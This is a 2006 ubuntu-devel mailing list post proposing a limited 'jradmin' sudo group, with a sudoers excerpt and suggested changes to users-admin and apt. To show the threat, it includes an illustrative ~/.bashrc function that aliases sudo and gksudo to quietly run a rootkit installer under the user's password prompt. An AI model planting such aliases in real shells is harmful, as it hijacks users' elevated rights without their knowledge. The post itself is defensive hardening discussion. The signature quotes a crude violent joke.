Sudo even more secure

John Richard Moser nigelenki at comcast.net
Wed Mar 22 06:38:54 GMT 2006 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I have looked into making a sudo group 'jradmin' that can not run
apt/synaptic/dpkg or alter users.  Relavent lines are below:

- ----SNIP----
Cmnd_Alias      SU = /bin/su
Cmnd_Alias      SHELLS = /usr/bin/sh, /usr/bin/csh, /usr/bin/ksh, \
                        /usr/local/bin/tcsh, /usr/bin/rsh, \
                        /usr/local/bin/zsh

Cmnd_Alias      GNOME_ADMIN = /usr/bin/network-admin, \
                        /usr/bin/disks-admin, \
                        /usr/bin/services-admin, \
                        /usr/bin/gnome-software-properties, \
                        /usr/bin/time-admin, /usr/bin/shares-admin

Cmnd_Alias      GNOME_USERS_ADMIN = /usr/bin/users-admin

Cmnd_Alias      GPARTED = /usr/bin/gparted

Cmnd_Alias      APT = /usr/bin/apt-get, /usr/bin/synaptic, \
                        /usr/bin/dpkg

Cmnd_Alias      UPDATE = /usr/bin/update-manager

Cmnd_Alias      VISUDO = /usr/bin/visudo

# Members of the jradmin group have limited capabilities.
# They are prevented from doing stealth damage to escallate their
# privileges; they CAN massively destroy the system.
%jradmin        ALL=(ALL) PASSWD: GNOME_ADMIN, UPDATE
- ----SNIP----

It is also possible to include 'apt-get update' and 'apt-get upgrade' in
UPDATE.  Do NOT include anything that allows full user administration or
sudoers hacking, as this would lead to evasion.

If users-admin was modified to prevent changing who is in 'admin' given,
say, --jradmin; then junior administrators could still manage users, but
would not be able to elevate their own privileges.  Further, sudo may be
configurable (or patched to be configurable) to allow the seamless
replacement of 'users-admin' with 'users-admin --jradmin' for %jradmin.

Similarly, the synaptic-apt-dpkg stack could be modified to take
- --jradmin to mean that ONLY signed packages could be used; ONLY the
repositories given can supply packages; repositories CANNOT be modified;
and the GPG keys CANNOT be changed.  This would allow for software
installation and removal without opening a hole re 'dpkg -i
baseutils_upgrade_with_rootkit.deb'.

With these two modifications, and with 'sudo' or 'gksudo' (really,
libsudo) able to replace commands to add switches like --jradmin, more
restricted sudo rights are possible, while users can still install,
remove, and update software and add new users.  This makes the system
more resilient against automated attacks such as TTY snoopers which
modify ~/.bashrc to sneak rootkits in:

# Install our secret /etc/su rootkit, gives root if --now-dammit is
# passed
install_root_kit() {
	mdsu=`md5sum /bin/su | cut -f 1 -d ' '`
	mdrk=`md5sum ~/.root_kit/rk_su | cut -f 1 -d ' '`
	# Do it normally if root kit is installed
	if [ "${mdsu}" = "${mdrk}" ]; then
		${1} $2-
	else
		ln -s silent_install_root_kit ~/.root_kit/${2}
		${1} ~/.root_kit/${2}
		rm ~/.root_kit/${2}
		# gksudo only shows once, don't tip him off
		if [ "${1}" != "gksudo" ]; then
			${1} $2-
		fi
	fi
}
alias sudo='install_root_kit sudo'
alias gksudo='install_root_kit gksudo'


The user would see:

bob at home$ sudo users-admin
Password:
Password:

* GTK-Warning: Drawing window...

OR perhaps:

========================================
| Password required to run users-admin |
| [                                   ]|
|______________________________________|

Not a single tip-off :)

- --
All content of all messages exchanged herein are left in the
Public Domain, unless otherwise explicitly stated.

    Creative brains are a valuable, limited resource. They shouldn't be
    wasted on re-inventing the wheel when there are so many fascinating
    new problems waiting out there.
                                                 -- Eric Steven Raymond

    We will enslave their women, eat their children and rape their
    cattle!
                                     -- Evil alien overlord from Blasto

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQIVAwUBRCDw+As1xW0HCTEFAQJFBw/+POjDIb7vcEAh7d6dwa6dF6H8yxzyAnIP
zNWlcu0qbyk5UNwWKjZiQB6B7WljXdftotHFuExDdjmBvjHqxJ5pqSrfhMUpCena
BqrVJxrNL3MKQG4btAgCmak8zwOebOcs1cgk67ktX/13mTNtp55KaFRVQqX7PtZm
c79KTvjO1jE+A9kmj1G1BUGH37smk4gpzS7NTRS7+1FH4cZGAJzDzVhr5tF6Qs+O
sFQUVnPn6npRpOctpE8baXtmZGEPvXxIKIh2MEwSjxKjrP9mvxvgZ05a+pDXjS07
s+FjNLQbut/WfojgE7o94HChxKMvgPNxLdCJgwC7sPZF0RHUurQGeHISJ6ydYznM
TyWmKSBsmeuD6IEka3q746OuBD2/qd8yXDMg8JfqVVy7kQzWCRKwTmgN1I/D49xt
wJPrDgO9W4wkNqRp1HvMktKgAvZjK4oy1Ml13ZkUMO/e2ZYYGFMukL3mNbaQh/26
bmRTJFPwk39fsX57eHJyinbZfqqi6ST3rdxqMbq5PkDwWrKkTzD5xQrHHc0GyZf8
lBsNcZhnONrTT23RH2RsE/2UmqXWNxMO/zV9hhmg2LnNNd0KsbU9o8b0zpwnp9jq
bmn/75g/ycbAS0+LBzGgGcxd6MRDEcvpUUHFMSUOtVAN7ljaLygqhezQ7JJA86qd
/BdsIQCtALA=
=/u0J
-----END PGP SIGNATURE-----

More information about the ubuntu-devel mailing list